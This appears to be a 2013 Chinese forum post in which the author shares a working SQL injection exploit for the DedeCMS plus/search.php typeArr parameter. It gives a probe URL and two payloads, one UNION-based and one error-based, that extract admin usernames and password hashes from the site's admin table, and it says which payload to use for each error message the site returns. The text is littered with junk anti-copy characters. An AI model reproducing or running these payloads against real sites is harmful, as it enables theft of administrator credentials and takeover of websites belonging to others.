转载不加作者名的没JJ+ j4 |( ]7 X( q8 y/ [8 }0 e
6 A+ f" {' u3 c: V! ?哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
; f; A( `$ k* F% R: H W9 i% p! ~+ n9 s& K3 R& k: q6 o+ V
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
" N# t# Y8 p: H3 ^4 _+ M3 w9 G- e) A S2 U* i5 Q
我一般是这样测试的:7 z9 `$ R C$ a& \. M
S( ]- e1 C* d! P; b
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
5 t. B. t2 q8 J& d
* R2 N5 t8 h$ k4 ]7 B J7 U. H转载不加作者名的没JJ
8 n7 Z* n$ x8 X
1 n. S S& i9 p7 v d作者:鬼哥
! N! Q* a6 {/ i- q2 [4 y
( }- ]& ^2 w3 w0 H 9 k r, M& F( m9 @5 L
! P( r9 A3 ~1 W! n/ n看结果如果提示7 k* r# U" s% `- q5 l6 Z
) G# j: o" B( _3 mSafe Alert: Request Error step 2 !2 D6 s# c Q) X3 q- i) Z
* i( |* D n6 r2 u2 C那么直接用下面的exp( C: B3 [; b1 _/ Q) c; q9 v
/ K' h, C$ h( cxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a5 z6 O4 P1 M7 t- y* C
$ t* X' i" i3 g- i+ g, C( \4 H6 H
" D/ S0 {) H( U8 i3 }
看结果如果提示
2 v7 a& A7 s# A0 Q# T
- O; Y Y% s% Z; y! y. HSafe Alert: Request Error step 1 !/ [6 E, Z/ v* Z
5 D8 C0 K, Y* m那么直接用下面的exp8 N% y% h( k. y! U1 t8 s4 e9 v
0 K+ n1 Y9 X6 ~- pxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
3 x# ]( h9 G6 v+ f2 t* A) Z! o
* i; h9 T/ F& I* i9 h0 ?/ V8 S8 L; W' w+ J2 O
如果正常显示证明漏洞不存在了。
& ]$ ?8 r2 ]. N8 |$ |
3 Y- D) s% X: A8 V转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对